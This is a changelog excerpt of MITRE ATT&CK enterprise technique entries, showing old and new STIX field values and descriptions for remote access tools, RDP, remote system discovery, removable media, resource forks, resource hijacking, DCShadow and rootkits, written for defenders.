AnyDesk, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.(Citation: Symantec Living off the Land) Remote access tools may be installed and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Installation of many remote access tools may also include persistence (ex: the tool's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Admin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns.(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) |
| external_references[1]['source_name'] | Symantec Living off the Land | CrowdStrike 2015 Global Threat Report |
| external_references[1]['description'] | Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018. | CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018. |
| external_references[1]['url'] | https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf | https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf |
| external_references[2]['source_name'] | CrowdStrike 2015 Global Threat Report | CrySyS Blog TeamSpy |
| external_references[2]['description'] | CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018. | CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ tolko s razreshenija S-a. Retrieved April 11, 2018. |
| external_references[2]['url'] | https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf | https://blog.crysys.hu/2013/03/teamspy/ |
| external_references[3]['source_name'] | CrySyS Blog TeamSpy | Symantec Living off the Land |
| external_references[3]['description'] | CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ tolko s razreshenija S-a. Retrieved April 11, 2018. | Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018. |
| external_references[3]['url'] | https://blog.crysys.hu/2013/03/teamspy/ | https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf |
| x_mitre_version | 2.0 | 2.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Zachary Stanford, @svch0st | |
| x_mitre_data_sources | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Old Description | New Description |
|---|---|
| Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware) | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-02-25 19:23:34.204000+00:00 | 2022-03-28 16:07:44.605000+00:00 |
| description | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation: Alperovitch Malware) | Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware) |
| x_mitre_data_sources[0] | Process: Process Creation | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[1] | Network Traffic: Network Connection Creation | Logon Session: Logon Session Creation |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Flow | Process: Process Creation |
| x_mitre_data_sources[3] | Logon Session: Logon Session Creation | Network Traffic: Network Traffic Flow |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user. In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 14:15:07.272000+00:00 | 2022-03-28 16:07:45.017000+00:00 |
| x_mitre_data_sources[4] | Command: Command Execution | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Module: Module Load |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Module: Module Load |
| Old Description | New Description |
|---|---|
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. |
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039).
Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
|
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] | |
| external_references | CAPEC-292 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 15:30:00.172000+00:00 | 2022-09-06 22:04:59.486000+00:00 |
| description | Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems.
|
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039).
Adversaries may also analyze data from local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. show cdp neighbors, show arp).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
|
| external_references[1]['source_name'] | capec | CISA AR21-126A FIVEHANDS May 2021 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/292.html | https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Access |
| x_mitre_data_sources[2] | Network Traffic: Network Connection Creation | Process: Process Creation |
| x_mitre_data_sources[3] | File: File Access | Network Traffic: Network Connection Creation |
| x_mitre_version | 3.2 | 3.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'} | |
| external_references | {'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/292.html', 'external_id': 'CAPEC-292'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_platforms | Network |
| Old Description | New Description |
|---|---|
| Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. | Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Joas Antonio dos Santos, @Cr4zyC0d3'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-20 02:18:04.581000+00:00 | 2022-10-21 19:14:13.179000+00:00 |
| description | Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. | Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself. Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled). |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Windows Malware Infecting Android', 'description': 'Lucian Constantin. (2014, January 23). Windows malware tries to infect Android devices connected to PCs. Retrieved May 25, 2022.', 'url': 'https://www.computerworld.com/article/2486903/windows-malware-tries-to-infect-android-devices-connected-to-pcs.html'} | |
| external_references | {'source_name': 'iPhone Charging Cable Hack', 'description': 'Zack Whittaker. (2019, August 12). This hacker’s iPhone charging cable can hijack your computer. Retrieved May 25, 2022.', 'url': 'https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/'} | |
| external_references | {'source_name': 'Exploiting Smartphone USB ', 'description': 'Zhaohui Wang & Angelos Stavrou. (n.d.). Exploiting Smart-Phone USB Connectivity For Fun And Profit. Retrieved May 25, 2022.', 'url': 'https://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.226.3427&rep=rep1&type=pdf'} | |
| x_mitre_data_sources | File: File Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Creation |
| Description |
|---|
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:50:40.276000+00:00 | 2022-05-05 05:10:23.890000+00:00 |
| external_references[1]['source_name'] | macOS Hierarchical File System Overview | tau bundlore erika noerenberg 2020 |
| external_references[1]['description'] | Tenon. (n.d.). Retrieved October 12, 2021. | Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021. |
| external_references[1]['url'] | http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553 | https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html |
| external_references[5]['source_name'] | tau bundlore erika noerenberg 2020 | macOS Hierarchical File System Overview |
| external_references[5]['description'] | Erika Noerenberg. (2020, June 29). TAU Threat Analysis: Bundlore (macOS) mm-install-macos. Retrieved October 12, 2021. | Tenon. (n.d.). Retrieved October 12, 2021. |
| external_references[5]['url'] | https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html | http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553 |
| x_mitre_defense_bypassed[0] | Notarization; Gatekeeper | Notarization |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_defense_bypassed | Gatekeeper |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Old Description | New Description |
|---|---|
| Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners) | Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems, which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners) Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 12:06:32.187000+00:00 | 2022-04-18 20:16:44.560000+00:00 |
| description | Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based(Citation: CloudSploit - Unused AWS Regions) systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining. Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) Additionally, some cryptocurrency mining malware kills off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners) | Adversaries may leverage the resources of co-opted systems in order to solve resource intensive problems, which may impact system and/or hosted service availability. One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs) Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners) Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) |
| external_references[1]['source_name'] | Kaspersky Lazarus Under The Hood Blog 2017 | Unit 42 Hildegard Malware |
| external_references[1]['description'] | GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019. | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. |
| external_references[1]['url'] | https://securelist.com/lazarus-under-the-hood/77908/ | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ |
| external_references[3]['source_name'] | Unit 42 Hildegard Malware | Kaspersky Lazarus Under The Hood Blog 2017 |
| external_references[3]['description'] | Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021. | GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019. |
| external_references[3]['url'] | https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ | https://securelist.com/lazarus-under-the-hood/77908/ |
| x_mitre_data_sources[0] | Process: Process Creation | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[1] | Command: Command Execution | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[3] | Network Traffic: Network Connection Creation | Sensor Health: Host Status |
| x_mitre_data_sources[4] | Network Traffic: Network Traffic Flow | Command: Command Execution |
| x_mitre_data_sources[5] | Sensor Health: Host Status | Process: Process Creation |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'GoBotKR', 'description': 'Zuzana Hromcová. (2019, July 8). Malicious campaign targets South Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.', 'url': 'https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/'} |
| Description |
|---|
| Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys. Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide) This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 15:13:27.670000+00:00 | 2022-03-08 21:20:04.850000+00:00 |
| x_mitre_data_sources[1] | Active Directory: Active Directory Object Modification | User Account: User Account Authentication |
| x_mitre_data_sources[3] | User Account: User Account Authentication | Active Directory: Active Directory Object Modification |
| x_mitre_detection | Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog) Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018) Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog) Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete. | Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog) Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018) Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog) Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete. |
| x_mitre_version | 2.0 | 2.1 |
| Description |
|---|
| Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017. | |
| external_references | CAPEC-552 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'root'] | |
| external_references | CAPEC-552 | |
| external_references | Pan, M., Tsai, S. (2014). You can’t see me: A Mac OS X Rootkit uses the tricks you haven't known yet. Retrieved December 21, 2017. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:29:55.496000+00:00 | 2022-05-05 05:09:39.723000+00:00 |
| external_references[1]['source_name'] | capec | CrowdStrike Linux Rootkit |
